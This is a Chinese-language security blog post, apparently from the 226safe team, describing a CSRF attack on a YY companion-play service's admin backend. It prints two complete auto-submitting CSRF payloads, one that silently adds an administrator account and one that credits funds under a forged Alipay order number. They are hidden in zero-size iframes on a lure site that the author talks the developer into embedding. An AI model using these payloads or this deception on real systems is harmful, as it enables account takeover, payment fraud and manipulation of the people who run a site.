一個猥瑣的持續性攻擊思路
註:1,相關站點運維已授權
2,褲子以刪除並且關閉站點一,事情的起初
我了,算是 歪歪 的忠實玩家吧,從直播間娛樂模板到相親模板,再到虎牙,再到現在陪玩。基本上能玩的都玩過。所以了,我的很多積蓄也都扔上面了,#(抱臉哭...)
對了,尤其是 陪玩 這個,記得當初頭腦一發熱,就在51X上花 500 開了個後台。
現在想想好是心痛啊,所以就想著,要不搞搞?友情一波?
在勘測的時候,發現,這個後台竟然不是用的官方模板後台,而是個人開發的。
都是類似於這樣 。
二,猥瑣套路的準備工作
首先簡單分析了下測試網站(測試站點為後台演示網站,與實際目標站點後台基本一致,兩個站點都有CDN),他有個自己寫的小waf,所以嘗試了XSS,注入,上傳都不行。而且用了百度雲加速,上傳文件限制很嚴。
這時候我也想過旁站C段,但是所有子域名都上了cdn,能試的方法都試了,不行,找不到真實IP,掃全網的話,我電腦太渣就沒去嘗試。
最後想想從邏輯方面著手吧。
測試了下越權修改他人密碼,信息,充值等操作,但是發現他的數據包裡面都沒有用戶相關信息,只有新舊密碼驗證,而且還有手機驗證。
突然,我發現站點好像沒有驗證session 或token 這個?難道存在 CSRF ?復現測試一下,我擦,好像真的存在 CSRF 。。。直接利用CSRF 這個漏洞添加上管理員了。
不過,感覺有點雞肋,不搞了,,,沒勁了。。。
三,猥瑣套路的進行
中間休息了大概一個月吧,沒去想這件事,都是在平台上玩玩,消費消費。
突然前幾天想起來這件事,心裡尋思按照道理來說這種網站是不會出售源碼的,應該是賣了使用權吧,而且看開發人員掛的廣告挺多的,沒辦法找到這個網站的開發人員。
不過,我發現好像整個歪歪工會的網站都是一個管理在維護的,那就套路一波吧 。
其實以前就聊過,只不過沒有涉及重點,只是想參考參考源碼類的,不過人家沒答應,畢竟這是商業化的,肯定不會給的。
這次找他呢,主要是運用心理戰術,大家說社工之前需要做好準備工作,收集信息,我這個人比較直也比較懶。什麼收集信息啊煩,我只知道幾件事:
1. 我的目標是某個網站
2. 這個網站程序是他開發的
3. 我需要靠他來搞定利用CSRF的機會
不過也不需要雜收集,畢竟都是網站類的,自己也比較熟悉,只構思了一個宏大的套路,恩,很宏大。
套路已經構思好,那就先開始套近乎吧。
那麼問題來了,我就一窮屌絲,沒錢,更別說數據了,咋搞啊? MD , 自己織的套路,含著淚也要織下去。。。。
然後找小夥伴借錢,先買了一個空間,恩,空間有了,那數據咋搞啊?早知道就不瞎幾把吹那麼大了,,,心累啊。。。。
身為一個白帽子,如何能為這點困難而折腰?百度搜索一波~
恩,找到了那麼一點點,,,就這吧,先糊弄的試試。。。
CSRF POC:
<html>n <body>n <form action="http://XXX.xxxxxx.com/Qwadmin/Peiwanmember/update.html" method="POST" name="myfrom">n <input type="hidden" name="head" value="" />n <input type="hidden" name="user" value="ooo" />n <input type="hidden" name="bid" value="5" />n <input type="hidden" name="group&#95;id" value="1" />n <input type="hidden" name="password" value="123123" />n <input type="hidden" name="sex" value="0" />n <input type="hidden" name="fenlei&#95;15" value="" />n <input type="hidden" name="fenlei&#95;16" value="" />n <input type="hidden" name="fenlei&#95;17" value="" />n <input type="hidden" name="phone" value="" />n <input type="hidden" name="qq" value="" />n <input type="hidden" name="yyid" value="" />n <input type="hidden" name="email" value="" />n <input type="hidden" name="zhifubao" value="" />n <input type="hidden" name="zhekou" value="100" />n <input type="hidden" name="tichengbili" value="70" />n <input type="hidden" name="info" value="" />nt t<script>nt<!--ntfunction sub(){ntdocument.myfrom.submit();nt}ntsetTimeout(sub,100);nt//-->nt</script>n </form>n </body>n</html>n
由於一定要滑鼠觸發事件,但是如果來個按鈕的話就很容易被發現問題,所以這裡用了
t t<script>nt<!--ntfunction sub(){ntdocument.myfrom.submit();nt}ntsetTimeout(sub,100);nt//-->nt</script>n
當用戶載入完頁面後0.1秒自動提交form表單,上面這個poc的話是添加管理員賬號的,那既然花錢當然也要來個自動充值的啊。
<html>n <body>n <form action="http://XXX.xxxxxx.com/Qwadmin/Peiwanmember/chongzhi.html" method="POST" name="myfrom">n <input type="hidden" name="aids" value="6018" />n <input type="hidden" name="numchong" value="300" />n <input type="hidden" name="numchongtype" value="5" />n <input type="hidden" name="numzeng" value="" />n <input type="hidden" name="oid" value="" />n <input type="hidden" name="cinfo" value="20170507200040011220210053559226&#43;300&#32;?&#133;&#187;?&#191;&#135;?&#140;&#171;?&#159;&#165;" />n <input type="hidden" name="numchongisshow" value="0" />n <input type="hidden" name="numchongshowinfo" value="?&#187;&#173;?&#180;&#185;" />nt<script>nt<!--ntfunction sub(){ntdocument.myfrom.submit();nt}ntsetTimeout(sub,100);nt//-->nt</script>n </form>n </body>n</html>n
由於一定要訂單編號不然容易被發現,我自己隨便改了一個支付寶的訂單編號~
頁面也是需要提交表單的也是利用了之前那段js
t<script>nt<!--ntfunction sub(){ntdocument.myfrom.submit();nt}ntsetTimeout(sub,100);nt//-->nt</script>n
但是這時候又出現了一個問題,就是提交 form 表單的時候頁面會跳轉,這裡我決定把頁面用 iframe嵌入到社工庫裡面,確保不影響頁面跳轉。
<iframe src="chongzhiyy.html" frameBorder="0" width="0" scrolling="no" height="0"></iframe>n
<iframe src="tianjia.html" frameBorder="0" width="0" scrolling="no" height="0"></iframe>n
這樣就是頁面載入之後同時也載入tianjia.html、chongzhiyy.html兩個頁面,就是上面那兩個poc了。
之後就算頁面跳轉也是嵌入到頁面的小頁面跳轉。
萬事俱備,現在就等著那邊開發配合,把我的社工庫嵌入進去了,,,,不過還是出了點叉子。。。
看來,只能等周一去公司改改把登錄去掉,至於數據,頭好疼,,,
還是那句話,自己織的坑,含著淚,也要補上去。。。
經過三天的等待,終於成了。
那我就登錄我那個後台看看吧,看看管不管用。
好像成了?我趕緊看下啊網頁源代碼。
再看看那個CSRF 隱藏頁面。
接下來就是等管理打開這個應用了之後添加管理員賬號密碼了~ -.-
四,猥瑣套路的收尾
由於風險程度等一些原因,沒有等管理員觸發之前,就已經刪除源碼數據等。
事後並主動協調商議該事件 。
本文作者為226safe成員:小小艾_Joker 文章首發於 226safe Team 專欄 / 謝絕轉載
推薦閱讀:
※假如黑客知道某個遊戲玩家的個人信息又能做什麼呢?
※如何讓已經知道你wifi密碼的鄰居主動另外購買房東的網路?
※社會工程學和欺騙有什麼區別?
※乘坐飛機如何選座,身邊的人是美女幾率大些?
※NO.8 雜談:對社會工程學的一些小小的想法